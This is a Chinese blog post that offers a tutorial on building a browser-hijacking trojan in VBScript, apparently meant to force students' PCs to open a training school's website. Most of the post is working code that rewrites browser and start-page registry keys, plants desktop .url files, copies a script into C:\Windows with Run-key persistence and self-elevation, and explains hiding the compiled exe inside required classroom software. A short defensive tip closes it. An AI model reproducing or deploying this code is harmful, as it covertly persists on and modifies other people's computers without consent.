<!DOCTYPE html><html lang="zh-CN" data-theme="light"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width,initial-scale=1"><title>Windows_Windows快捷方式 | AugJungle</title><meta name="description" content="基于注入式木马病毒（浏览器绑架）实现及防御方法的研究申明：  本文章重在对技术的研究和讨论，为学开发的同学提供一种实现思路，为学习测试的同学提供一个软件安全测试的方向。如有读者通过本文进行一些个人篡改，及进行非法途径操作等，与蜗牛学院以及作者无关。前言：  在蜗牛学院学习的同学都知道，每天讲师授课之后都会将当天的授课视频上传到我们的在线课堂（www.woniuxy.com），学生只要登录进去就可以"><meta name="keywords" content="Windows快捷方式"><meta name="author" content="AugJungle"><meta name="copyright" content="AugJungle"><meta name="format-detection" content="telephone=no"><meta name="theme-color" content="#ffffff"><meta http-equiv="Cache-Control" content="no-transform"><meta http-equiv="Cache-Control" content="no-siteapp"><link rel="shortcut icon" href="/selfFile/favicon.png"><link rel="canonical" href="https://ajungle.cn/2021/03/16/Windows/Windows_%E5%BF%AB%E6%8D%B7%E6%96%B9%E5%BC%8F/"><link rel="preconnect" href="//cdn.jsdelivr.net"/><meta name="baidu-site-verification" content="&lt;meta name=&quot;baidu-site-verification&quot; content=&quot;hBVMbZWgkL&quot; /&gt;"/><meta property="og:type" content="article"><meta property="og:title" content="Windows_Windows快捷方式"><meta property="og:url" content="https://ajungle.cn/2021/03/16/Windows/Windows_%E5%BF%AB%E6%8D%B7%E6%96%B9%E5%BC%8F/"><meta property="og:site_name" content="AugJungle"><meta property="og:description" content="基于注入式木马病毒（浏览器绑架）实现及防御方法的研究申明：  本文章重在对技术的研究和讨论，为学开发的同学提供一种实现思路，为学习测试的同学提供一个软件安全测试的方向。如有读者通过本文进行一些个人篡改，及进行非法途径操作等，与蜗牛学院以及作者无关。前言：  在蜗牛学院学习的同学都知道，每天讲师授课之后都会将当天的授课视频上传到我们的在线课堂（www.woniuxy.com），学生只要登录进去就可以"><meta property="og:image" content="https://i.loli.net/2020/05/01/gkihqEjXxJ5UZ1C.jpg"><meta property="article:published_time" content="2021-03-16T09:55:56.440Z"><meta property="article:modified_time" content="2021-06-05T09:32:32.060Z"><meta name="twitter:card" content="summary"><link rel="stylesheet" href="/css/index.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free/css/all.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/node-snackbar/dist/snackbar.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/instantsearch.js@2.10.5/dist/instantsearch.min.css"><script src="https://cdn.jsdelivr.net/npm/instantsearch.js@2.10.5/dist/instantsearch.min.js" defer></script><script>var GLOBAL_CONFIG = { 
  root: '/',
  hexoversion: '5.1.1',
  algolia: {"appId":"U7MLC7HHI0","apiKey":"421428bc9002e29b988f9d9a932178e2","indexName":"Jungle","hits":{"per_page":6},"languages":{"input_placeholder":"搜索文章","hits_empty":"找不到您查询的内容：${query}","hits_stats":"找到 ${hits} 条结果，用时 ${time} 毫秒"}},
  localSearch: undefined,
  translate: {"defaultEncoding":2,"translateDelay":0,"msgToTraditionalChinese":"繁","msgToSimplifiedChinese":"簡"},
  noticeOutdate: undefined,
  highlight: {"plugin":"highlighjs","highlightCopy":true,"highlightLang":true},
  copy: {
    success: '复制成功',
    error: '复制错误',
    noSupport: '浏览器不支持'
  },
  bookmark: {
    message_prev: '按',
    message_next: '键将本页加入书签'
  },
  runtime: '天',
  date_suffix: {"one_hour":"刚刚","hours":"小时前","day":"天前"},
  copyright: undefined,
  ClickShowText: undefined,
  medium_zoom: false,
  fancybox: true,
  Snackbar: {"bookmark":{"message_prev":"按","message_next":"键将本页加入书签"},"chs_to_cht":"你已切换为繁体","cht_to_chs":"你已切换为简体","day_to_night":"你已切换为深色模式","night_to_day":"你已切换为浅色模式","bgLight":"#49b1f5","bgDark":"#121212","position":"top-center"},
  justifiedGallery: {
    js: 'https://cdn.jsdelivr.net/npm/justifiedGallery/dist/js/jquery.justifiedGallery.min.js',
    css: 'https://cdn.jsdelivr.net/npm/justifiedGallery/dist/css/justifiedGallery.min.css'
  },
  baiduPush: false,
  isPhotoFigcaption: true,
  islazyload: true,
  isanchor: true
};

var saveToLocal = {
  set: function setWithExpiry(key, value, ttl) {
    const now = new Date()
    const expiryDay = ttl * 86400000
    const item = {
      value: value,
      expiry: now.getTime() + expiryDay,
    }
    localStorage.setItem(key, JSON.stringify(item))
    },

  get: function getWithExpiry(key) {
    const itemStr = localStorage.getItem(key)

    if (!itemStr) {
      return undefined
    }
    const item = JSON.parse(itemStr)
    const now = new Date()

    if (now.getTime() > item.expiry) {
      localStorage.removeItem(key)
      return undefined
    }
    return item.value
  }
}</script><script id="config_change">var GLOBAL_CONFIG_SITE = { 
  isPost: true,
  isHome: false,
  isHighlightShrink: false,
  isSidebar: false,
  postUpdate: '2021-06-05 17:32:32'
}</script><noscript><style type="text/css">
#nav {
  opacity: 1
}
.justified-gallery img {
  opacity: 1
}
</style></noscript><script>var activateDarkMode = function () {
  document.documentElement.setAttribute('data-theme', 'dark')
  if (document.querySelector('meta[name="theme-color"]') !== null) {
    document.querySelector('meta[name="theme-color"]').setAttribute('content', '#0d0d0d')
  }
}
var activateLightMode = function () {
  document.documentElement.setAttribute('data-theme', 'light')
  if (document.querySelector('meta[name="theme-color"]') !== null) {
    document.querySelector('meta[name="theme-color"]').setAttribute('content', '#ffffff')
  }
}

var autoChangeMode = 'false'
var t = saveToLocal.get('theme')
if (autoChangeMode === '1') {
  var isDarkMode = window.matchMedia('(prefers-color-scheme: dark)').matches
  var isLightMode = window.matchMedia('(prefers-color-scheme: light)').matches
  var isNotSpecified = window.matchMedia('(prefers-color-scheme: no-preference)').matches
  var hasNoSupport = !isDarkMode && !isLightMode && !isNotSpecified

  if (t === undefined) {
    if (isLightMode) activateLightMode()
    else if (isDarkMode) activateDarkMode()
    else if (isNotSpecified || hasNoSupport) {
      var now = new Date()
      var hour = now.getHours()
      var isNight = hour <= 6 || hour >= 18
      isNight ? activateDarkMode() : activateLightMode()
    }
    window.matchMedia('(prefers-color-scheme: dark)').addListener(function (e) {
      if (saveToLocal.get('theme') === undefined) {
        e.matches ? activateDarkMode() : activateLightMode()
      }
    })
  } else if (t === 'light') activateLightMode()
  else activateDarkMode()
} else if (autoChangeMode === '2') {
  now = new Date()
  hour = now.getHours()
  isNight = hour <= 6 || hour >= 18
  if (t === undefined) isNight ? activateDarkMode() : activateLightMode()
  else if (t === 'light') activateLightMode()
  else activateDarkMode()
} else {
  if (t === 'dark') activateDarkMode()
  else if (t === 'light') activateLightMode()
}</script><link rel="stylesheet" href="/css/backgroud_jungle.css"><meta name="generator" content="Hexo 5.1.1"><link rel="alternate" href="/atom.xml" title="AugJungle" type="application/atom+xml">
</head><body><div id="loading-box"><div class="loading-left-bg"></div><div class="loading-right-bg"></div><div class="wizard-scene"><div class="wizard-objects"><div class="wizard-square"></div><div class="wizard-circle"></div><div class="wizard-triangle"></div></div><div class="wizard"><div class="wizard-body"></div><div class="wizard-right-arm"><div class="wizard-right-hand"></div></div><div class="wizard-left-arm"><div class="wizard-left-hand"></div></div><div class="wizard-head"><div class="wizard-beard"></div><div class="wizard-face"><div class="wizard-adds"></div></div><div class="wizard-hat"><div class="wizard-hat-of-the-hat"></div><div class="wizard-four-point-star --first"></div><div class="wizard-four-point-star --second"></div><div class="wizard-four-point-star --third"></div></div></div></div></div></div><div id="mobile-sidebar"><div id="menu_mask"></div><div id="mobile-sidebar-menus"><div class="mobile_author_icon"><img class="avatar-img" data-lazy-src="/selfFile/avatar.png" onerror="onerror=null;src='/img/friend_404.gif'" alt="avatar"/></div><div class="mobile_post_data"><div class="mobile_data_item is-center"><div class="mobile_data_link"><a href="/archives/"><div class="headline">文章</div><div class="length_num">46</div></a></div></div><div class="mobile_data_item is-center">      <div class="mobile_data_link"><a href="/tags/"><div class="headline">标签</div><div class="length_num">77</div></a></div></div><div class="mobile_data_item is-center">     <div class="mobile_data_link"><a href="/categories/"><div class="headline">分类</div><div class="length_num">19</div></a></div></div></div><hr/><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> 首页</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fas fa-archive"></i><span> 时间轴</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fas fa-tags"></i><span> 标签</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fas fa-folder-open"></i><span> 分类</span></a></div><div class="menus_item"><a class="site-page" href="javascript:void(0);"><i class="fa-fw fas fa-list"></i><span> 娱乐</span><i class="fas fa-chevron-down expand"></i></a><ul class="menus_item_child"><li><a class="site-page" href="/music/"><i class="fa-fw fas fa-music"></i><span> 音乐</span></a></li><li><a class="site-page" href="/movies/"><i class="fa-fw fas fa-video"></i><span> 电影</span></a></li></ul></div><div class="menus_item"><a class="site-page" href="/link/"><i class="fa-fw fas fa-link"></i><span> 友链</span></a></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fas fa-heart"></i><span> 关于</span></a></div></div></div></div><div id="body-wrap"><header class="post-bg" id="page-header" style="background-image: url(https://i.loli.net/2020/05/01/gkihqEjXxJ5UZ1C.jpg)"><nav id="nav"><span id="blog_name"><a id="site-name" href="/">AugJungle</a></span><span id="menus"><div id="search_button"><a class="site-page social-icon search"><i class="fas fa-search fa-fw"></i><span> 搜索</span></a></div><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> 首页</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fas fa-archive"></i><span> 时间轴</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fas fa-tags"></i><span> 标签</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fas fa-folder-open"></i><span> 分类</span></a></div><div class="menus_item"><a class="site-page" href="javascript:void(0);"><i class="fa-fw fas fa-list"></i><span> 娱乐</span><i class="fas fa-chevron-down expand"></i></a><ul class="menus_item_child"><li><a class="site-page" href="/music/"><i class="fa-fw fas fa-music"></i><span> 音乐</span></a></li><li><a class="site-page" href="/movies/"><i class="fa-fw fas fa-video"></i><span> 电影</span></a></li></ul></div><div class="menus_item"><a class="site-page" href="/link/"><i class="fa-fw fas fa-link"></i><span> 友链</span></a></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fas fa-heart"></i><span> 关于</span></a></div></div><span class="close" id="toggle-menu"><a class="site-page"><i class="fas fa-bars fa-fw"></i></a></span></span></nav><div id="post-info"><div id="post-title"><div class="posttitle">Windows_Windows快捷方式</div></div><div id="post-meta"><div class="meta-firstline"><span class="post-meta-date"><i class="far fa-calendar-alt fa-fw post-meta-icon"></i><span class="post-meta-label">发表于</span><time class="post-meta-date-created" datetime="2021-03-16T09:55:56.440Z" title="发表于 2021-03-16 17:55:56">2021-03-16</time><span class="post-meta-separator">|</span><i class="fas fa-history fa-fw post-meta-icon"></i><span class="post-meta-label">更新于</span><time class="post-meta-date-updated" datetime="2021-06-05T09:32:32.060Z" title="更新于 2021-06-05 17:32:32">2021-06-05</time></span><span class="post-meta-categories"><span class="post-meta-separator">|</span><i class="fas fa-inbox fa-fw post-meta-icon"></i><a class="post-meta-categories" href="/categories/Windows/">Windows</a></span></div><div class="meta-secondline"> <span class="post-meta-separator">|</span><span class="post-meta-wordcount"><i class="far fa-file-word fa-fw post-meta-icon"></i><span class="post-meta-label">字数总计:</span><span class="word-count">3k</span><span class="post-meta-separator">|</span><i class="far fa-clock fa-fw post-meta-icon"></i><span class="post-meta-label">阅读时长:</span><span>11分钟</span></span></div></div></div></header><main class="layout_post" id="content-inner"><article id="post"><div class="post-content" id="article-container"><p>基于注入式木马病毒（浏览器绑架）实现及防御方法的研究<br>申明：</p>
<p> 本文章重在对技术的研究和讨论，为学开发的同学提供一种实现思路，为学习测试的同学提供一个软件安全测试的方向。如有读者通过本文进行一些个人篡改，及进行非法途径操作等，与蜗牛学院以及作者无关。<br>前言：</p>
<p> 在蜗牛学院学习的同学都知道，每天讲师授课之后都会将当天的授课视频上传到我们的在线课堂（<a target="_blank" rel="noopener" href="http://www.woniuxy.com),学生只要登录进去就可以回看之前老师讲课的视频,从而进行复习.随着来我们蜗牛学院学习的同学越来越多,但很多刚入校的同学对电脑操作都很小白.然后我发现很多学生在进入我们官网的时候都是先打开百度,然后在百度上输入“蜗牛学院”搜索一下,再点击链接进入到我们官网.这样的操作既不方便,而且还会浪费百度推广的费用.针对上面的问题,让每个同学都去设置浏览器书签,这个工作量有点大,而且个班都要去操作一遍就显得很繁琐.所以作者才考虑到了用病毒的方式让学生强制绑定一个我们的官网,毕竟学技术的地方就用技术来解决实际问题./">www.woniuxy.com），学生只要登录进去就可以回看之前老师讲课的视频，从而进行复习。随着来我们蜗牛学院学习的同学越来越多，但很多刚入校的同学对电脑操作都很小白。然后我发现很多学生在进入我们官网的时候都是先打开百度，然后在百度上输入“蜗牛学院”搜索一下，再点击链接进入到我们官网。这样的操作既不方便，而且还会浪费百度推广的费用。针对上面的问题，让每个同学都去设置浏览器书签，这个工作量有点大，而且个班都要去操作一遍就显得很繁琐。所以作者才考虑到了用病毒的方式让学生强制绑定一个我们的官网，毕竟学技术的地方就用技术来解决实际问题。</a><br>正文：</p>
<p> 首先我们要先弄明白什么是浏览器绑架，即通过技术手段让你的浏览器打开的时候默认访问指定的网站，比如修改首页等。这种操作我们在几年前也经常看见，比如浏览器打开首页就变成了某123网站。大致的实现方式为通过一个本地软件，修改用户的注册表信息里面的默认浏览器以及默认主页的相关内容，然后用户的主页就变成了了指定的网站。以下一段代码通过VBS（Visual Basic Script）语言来实现将默认浏览器更改为IE和默认首页到我们的官网：</p>
<p>On Error Resume Next<br>Dim defaultUrl, regOPeration<br>defaultUrl = “<a target="_blank" rel="noopener" href="https://www.woniuxy.com&quot;/">https://www.woniuxy.com&quot;</a><br>Set regOPeration = CreateObject(“WScript.Shell”)<br>regOPeration.RegWrite “HKEY_CLASSES_ROOT\http\shell\open\command&quot;, “””C:\Program Files\Internet Explorer\iexplore.exe”” – “”%1”””<br>regOPeration.RegWrite “HKEY_CLASSES_ROOT\htmlfile\shell\open\command&quot;, “””C:\Program Files\Internet Explorer\iexplore.exe”” – “”%1”””<br>regOPeration.RegWrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page”, defaultUrl<br>regOPeration.RegWrite “HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page”, defaultUrl</p>
<pre><code>1
2
3
4
5
6
7
8</code></pre>
<p> 以下是对浏览器对应注册表位置：</p>
<p>系统默认浏览器注册表：<br>“HKEY_CLASSES_ROOT\http\shell\open\command&quot;<br>“HKEY_CLASSES_ROOT\htmlfile\shell\open\command&quot;<br>机器默认首页注册表：<br>“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page”<br>用户默认首页注册表：<br>“HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page”</p>
<pre><code>1
2
3
4
5
6
7</code></pre>
<p> 代码到这里可能有人会问：为什么用VBS这么古老的语言呢？其他语言像Java或Python能实现吗？首先VBS作为微软的亲儿子，虽然现在的使用范围比较小，但这个语言有一个其他语言不具备的优势就是在WIndows环境下可以很方便的调用WScript.Shell对象直接操作需要管理员权限的HKEY_CLASSES_ROOT注册表。还有一个特点是WIndows环境自带了VBS解释器，在微软环境下可以直接运行非常方便。所以上述代码只需要写在记事本中，然后将后缀名.txt改为.vbs就可以运行了。然而对于其他语言来说也可以实现吗，当然是可以的。</p>
<p>执行前：</p>
<p>image-20210312173333912</p>
<p>image-20210312173535631</p>
<p>执行后：</p>
<p> image-20210312173426033</p>
<p>image-20210312173711053</p>
<p> 接下来问题来了，首要的一点就是首页注册表只能针对IE浏览器有效，而现在的用户几乎不会再使用IE浏览器作为系统默认浏览器。比如用户使用的是360，QQ，谷歌等浏览器作为默认浏览器，像这一类没有在系统注册表中提供首页接口的浏览器怎么去实现绑架呢？到这里只能换一种思路：通过对系统默认浏览器创建快捷方式到桌面，然后将浏览器快捷方式的访问首页设置为我们的在线课堂，这样的形式来完成绑架。相关代码如下所示：</p>
<p>Dim browserPath ‘默认浏览器路径<br>Dim starDir        ‘快捷方式起始位置<br>Dim WShell        ‘WScript对象<br>Dim desktopPath    ‘桌面对象<br>Dim link        ‘快捷方式对象<br>Dim firstUrl    ‘默认首页链接<br>Dim linkName    ‘快捷方式名称</p>
<p>linkName = “蜗牛学院-在线课堂”<br>firstUrl = “<a target="_blank" rel="noopener" href="http://www.woniuxy.com&quot;/">www.woniuxy.com&quot;</a><br>Set WShell = CreateObject(“WScript.Shell”)</p>
<p>‘截取到默认浏览器exe文件路径<br>browserPath = WShell.RegRead(“HKEY_CLASSES_ROOT\http\shell\open\command&quot;)<br>browserPath = Split(browserPath, “.exe”)(0)<br>browserPath = Mid(browserPath,2) &amp; “.exe”</p>
<p>‘获取起始位置<br>tempDir = Split(browserPath, “&quot;)<br>For i = 0 to UBound(tempDir) - 1<br>    starDir = starDir &amp; tempDir(i) &amp; “&quot;<br>Next<br>starDir = Mid(starDir,1, Len(starDir)-1)</p>
<p>‘创建桌面快捷方式<br>desktopPath = WShell.SpecialFolders(“Desktop”)<br>Set link = WShell.CreateShortcut(desktopPath &amp; “&quot; &amp; linkName &amp; “.lnk”)</p>
<p>link.TargetPath = browserPath    ‘目标位置<br>link.Arguments = firstUrl ‘添加默认页面<br>link.WindowStyle = 3    ‘激活方式：1默认窗口大小，3最大化，7最小化    </p>
<p>link.WorkingDirectory = starDir    ‘设置起始位置<br>link.IconLocation = browserPath    ‘设置图标<br>link.Save</p>
<pre><code>1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35</code></pre>
<p> 将上述代码写到txt文档中，再修改后缀名为.vbs运行之后的效果：</p>
<p>image-20210316150542087</p>
<p> 代码中的link.Arguments = firstUrl非常重要，因为要让快捷方式打开直接访问指定页面，在快捷方式的目标属性里面就必须加上页面地址，而如果是用CreateShortcut函数在后面拼接的方式添加则无法创建快捷方式。</p>
<p> image-20210316153346856</p>
<p> 代码写到这里之后，我们会发现三个问题。第一是如果系统中没有设置默认的浏览器（注册表中没有对应值）的情况下或是默认的浏览器没有在注册表中注册，那么用户打开快捷方式会使用IE或Edge。第二个问题是如果用户将桌面的快捷方式删除那么绑架的目的也达不到了。第三是代码是由一个vbs来触发执行，用户也不会傻乎乎的直接去双击。</p>
<p> 首先解决第一个问题，放弃使用快捷方式，直接使用url连接文件来解决，url连接文件里面存放的是指定的访问连接。用户点击url文件的时候会直接打开系统默认浏览器，相当于用户在excel中点击一个超链接一样，非常方便。创建url代码和快捷方式大同小异：</p>
<p>Dim urlFile<br>Dim WShell<br>Dim desktopPath<br>Dim filePath<br>Dim firstUrl<br>Set WShell = CreateObject(“WScript.Shell”)<br>desktopPath = WShell.SpecialFolders(“Desktop”)<br>filePath = desktopPath &amp; “\蜗牛学院在线课堂.url”<br>firstUrl = “<a target="_blank" rel="noopener" href="http://www.woniuxy.com&quot;/">http://www.woniuxy.com&quot;</a></p>
<p>set urlFile = CreateObject(“Scripting.Filesystemobject”).opentextfile(filePath, 8, True)<br>urlFile.WriteLine(“[InternetShortcut]”)<br>urlFile.WriteLine(“URL=” &amp; firstUrl)<br>urlFile.WriteLine(“showcommand=3”)<br>urlFile.Close</p>
<pre><code>1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16</code></pre>
<p> 运行效果：</p>
<p>image-20210316154919109</p>
<p> 接下来第二和第三个问题解决相对复杂一点，先说一下第二个问题。我们可以将上述vbs放到一个系统中公共而又几乎没有用户去关注的地方（C:\Windows），然后再通过修改注册表的方式设置为每次开机运行一次脚本。那么如果用户当前删除了url，重启电脑之后则又会出现。</p>
<p> 注册表开机启动项：</p>
<p>HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run</p>
<pre><code>1</code></pre>
<p> 相关代码：</p>
<p>Dim urlFile<br>Dim WShell<br>Dim desktopPath<br>Dim filePath<br>Dim firstUrl<br>Dim startPath    ‘开机启动位置</p>
<p>Set WShell = CreateObject(“WScript.Shell”)</p>
<p>‘添加当前文件到开机启动<br>startPath = “HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run”<br>WShell.RegWrite startPath &amp; “&quot; &amp; “woniuxy”, “C:\Windows\woniuxy_url.vbs” &amp; “ /r”, “REG_SZ”</p>
<p>desktopPath = WShell.SpecialFolders(“Desktop”)<br>filePath = desktopPath &amp; “\蜗牛学院在线课堂.url”<br>firstUrl = “<a target="_blank" rel="noopener" href="http://www.woniuxy.com&quot;/">http://www.woniuxy.com&quot;</a></p>
<p>set urlFile = CreateObject(“Scripting.Filesystemobject”).opentextfile(filePath, 8, True)<br>urlFile.WriteLine(“[InternetShortcut]”)<br>urlFile.WriteLine(“URL=” &amp; firstUrl)<br>urlFile.WriteLine(“showcommand=3”)<br>urlFile.Close</p>
<pre><code>1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22</code></pre>
<p> 将上述代码命名为woniuxy_url.vbs，然后放到C:\Windows文件中运行，则注册表中会新增开机启动该脚本。</p>
<p>image-20210316161027879</p>
<p> 到这里之后又有一个新的问题产生，那就是正常的用户不会主动将vbs脚本放到自己的Windows目录中。这里就需要和上面提到的问题三一起来解决。整体思路就是：</p>
<p>1、写一个vbs脚本woniuxy.vbs。</p>
<p>2、在woniuxy.vbs中向一个指定文件夹(C:\Windows)中写出另一个脚本woniuxy_url.vbs。（注意如果是Win10系统需要获取超级管理员权限）</p>
<p>3、将woniuxy.vbs编译成exe，然后注入到其他exe文件中。</p>
<p>woniuxy.vbs代码如下所示：</p>
<p>On Error Resume Next<br>WScript.Sleep 1500</p>
<p>Dim fso, startFile<br>Dim filePath    ‘文件路径<br>Dim WShell      ‘WScript对象<br>Dim startPath   ‘开机启动位置</p>
<p>‘超级管理员权限<br>If WScript.Arguments.Length = 0 Then<br>    Set ObjShell = CreateObject(“Shell.Application”)<br>    ObjShell.ShellExecute “wscript.exe”, “””” &amp; WScript.ScriptFullName &amp; “”” RunAsAdministrator”, , “runas”, 1<br>    WScript.Quit<br>End If</p>
<p>filePath = “C:\Windows\woniuxy_url.vbs”<br>Set fso = CreateObject(“scripting.filesystemobject”)<br>Set startFile = fso.CreateTextFile(filePath, , ture)</p>
<p>‘woniuxy_url.vbs内容<br>startFile.WriteLine “Dim urlFile,WShell,desktopPath,filePath,firstUrl”<br>startFile.WriteLine “Set WShell = CreateObject(“”WScript.Shell””)”<br>startFile.WriteLine “desktopPath = WShell.SpecialFolders(“”Desktop””)”<br>startFile.WriteLine “filePath = desktopPath &amp; “”\蜗牛学院在线课堂.url”””<br>startFile.WriteLine “firstUrl = “”<a target="_blank" rel="noopener" href="http://www.woniuxy.com&quot;&quot;&quot;/">http://www.woniuxy.com&quot;&quot;&quot;</a><br>startFile.WriteLine “set urlFile = CreateObject(“”Scripting.Filesystemobject””).opentextfile(filePath, 8, True)”<br>startFile.WriteLine “urlFile.WriteLine “”[InternetShortcut]”””<br>startFile.WriteLine “urlFile.WriteLine “”URL=”” &amp; firstUrl”<br>startFile.WriteLine “urlFile.WriteLine “”showcommand=3”””<br>startFile.WriteLine “urlFile.Close”</p>
<p>‘运行url<br>startFile.WriteLine “desktopPath = WShell.SpecialFolders(“”Desktop””)”<br>startFile.WriteLine “WShell.Run desktopPath &amp; “”\蜗牛学院在线课堂.url””, 4”<br>startFile.Close</p>
<p>‘文件添加到开机启动<br>Set WShell = CreateObject(“WScript.Shell”)<br>startPath = “HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run”<br>‘添加到开机启动项<br>WShell.RegWrite startPath &amp; “&quot; &amp; “woniuxy”, filePath &amp; “ /r”, “REG_SZ”</p>
<p>‘运行生成的脚本<br>WShell.Run filePath</p>
<pre><code>1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44</code></pre>
<p> 上述woniuxy.vbs完成之后，我们需要将其编译成exe执行文件。市面上比较常见的vbs编译器很多如Vbs_To_Exe等，但效果都不理想。VBS本身就是属于VB（Visual Basic）语言的一个脚本，他们之间的关系和Java与JavaScript不同，所以最好的方案是使用VB来为VBS加壳编译。使用方式也很简单，在VB中新建一个窗体，不需要任何控件，将woniuxy.vbs的源码写入到Form_Load函数中。然后在窗体属性中将Visible属性设置为False（启动时隐藏窗体）。</p>
<p>image-20210316163031728</p>
<p> 通过VB编译成exe之后，我们的木马就制作完成了。最后一步就是将木马exe文件注入到另一个经常使用的exe文件中。本文选择的是基于电子教室学生端，因为来蜗牛学院学习的同学，都必须安装这个学生端才能正常听课。然后关于文件的脱壳和加壳过程，不属于本文研究范围，就不在这里阐述了，有兴趣的小伙伴可以联系作者或是在后面跟贴讨论。</p>
<p>image-20210316163704250<br>结语：</p>
<p> 最后我要说的是，为了不侵犯其他软件的利益，上述所有技术中都不涉及到免杀过程。也就是说如果用户系统中存在杀毒软件上述木马是绕不过去的。</p>
<p>image-20210316164005764</p>
<p> 同时如果各位小伙伴对电脑掌控能力不足，又担心日常使用中病毒，又不愿意安装杀毒软件（流氓绑定太多）的情况下（本人裸奔十多年）。平时就应该养成多观察系统环境的习惯，比如任务管理器中的启动项，看一下有没有自己不熟悉的，再看看本文中注册表对应的位置有没有被修改过。最后建议电脑新手尽量使用UAC（微软的账户控制），这是系统级别对环境中的任何解释器和执行器进行的监控。</p>
</div><div class="tag_share"><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/Windows%E5%BF%AB%E6%8D%B7%E6%96%B9%E5%BC%8F/">Windows快捷方式</a></div><div class="post_share"><div class="social-share" data-image="https://i.loli.net/2020/05/01/gkihqEjXxJ5UZ1C.jpg" data-sites="facebook,twitter,wechat,weibo,qq"></div><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/social-share.js/dist/css/share.min.css"><script src="https://cdn.jsdelivr.net/npm/social-share.js/dist/js/social-share.min.js" defer></script></div></div><div class="post-reward"><div class="reward-button"><i class="fas fa-qrcode"></i> 打赏<div class="reward-main"><ul class="reward-all"><li class="reward-item"><a href="/selfFile/wechat.jpg" target="_blank"><img class="post-qr-code-img" data-lazy-src="/selfFile/wechat.jpg" alt="微信"/></a><div class="post-qr-code-desc">微信</div></li><li class="reward-item"><a href="/selfFile/alipay.jpg" target="_blank"><img class="post-qr-code-img" data-lazy-src="/selfFile/alipay.jpg" alt="支付寶"/></a><div class="post-qr-code-desc">支付寶</div></li></ul></div></div></div><nav class="pagination-post" id="pagination"><div class="prev-post pull-left"><a href="/2021/06/05/%E5%8C%BA%E5%9D%97%E9%93%BE/%E5%8C%BA%E5%9D%97%E9%93%BE_%E5%89%8D%E8%A8%80001/"><img class="prev-cover" data-lazy-src="https://i.loli.net/2020/05/01/gkihqEjXxJ5UZ1C.jpg" onerror="onerror=null;src='/img/404.jpg'"><div class="pagination-info"><div class="label">上一篇</div><div class="prev_info">区块链_前言001</div></div></a></div><div class="next-post pull-right"><a href="/2021/03/03/%E5%B7%A5%E4%BD%9C/%E5%B7%A5%E4%BD%9C_moondex%E4%BA%A4%E6%98%93%E6%89%80/"><img class="next-cover" data-lazy-src="https://cdn.jsdelivr.net/gh/Griffonage/Figurebed/img/20201129224000.jpg" onerror="onerror=null;src='/img/404.jpg'"><div class="pagination-info"><div class="label">下一篇</div><div class="next_info">比特币交易平台及虚拟货币学习指南</div></div></a></div></nav><hr/><div id="post-comment"><div class="comment-head"><div class="comment-headline"><i class="fas fa-comments fa-fw"></i><span> 评论</span></div></div><div class="comment-wrap"><div><div class="vcomment" id="vcomment"></div></div></div></div></article></main><footer id="footer" style="background-image: url(https://i.loli.net/2020/05/01/gkihqEjXxJ5UZ1C.jpg)" data-type="photo"><div id="footer-wrap"><div class="copyright">&copy;2008 - 2021 By AugJungle<a href='https://www.foreverblog.cn/' target='_blank' > <img src='https://img.foreverblog.cn/logo_en_default.png' alt='' style='width:auto;height:16px;'> </a></div><div class="framework-info"><span> </span><img src="https://img.shields.io/badge/Frame-Hexo-blue"/><span> </span><img src="https://img.shields.io/badge/Theme-Butterfly-6513df"/><span> </span><img src="https://img.shields.io/badge/CDN-jsDelivr-orange"/><span> </span><img src="https://img.shields.io/badge/Hosted-Coding-0cedbe"/><span> </span><img src="https://img.shields.io/badge/OSS-七牛云-bronze"/><span> </span><img src="https://img.shields.io/badge/Search-Algolia-purple"/></div><div class="footer_custom_text">鹅鹅鹅,曲项向天歌</div><div class="icp"><a target="_blank" rel="noopener" href="https://beian.miit.gov.cn/"><img class="icp-icon" src="https://file.ajungle.cn/img/icp.png"/><span>湘ICP备2020022557号-1</span></a></div><div class="gov"><a target="_blank" rel="noopener" href="http://www.beian.gov.cn/portal/registerSystemInfo?recordcode=43312502000142"><img class="icp-icon" src="https://file.ajungle.cn/img/gongan.png"/><span>湘公网安备 43312502000142号</span></a></div></div></footer></div><section id="rightside"><div id="rightside-config-hide"><button id="readmode" type="button" title="阅读模式"><i class="fas fa-book-open"></i></button><button id="translateLink" type="button" title="简繁转换">繁</button><button id="darkmode" type="button" 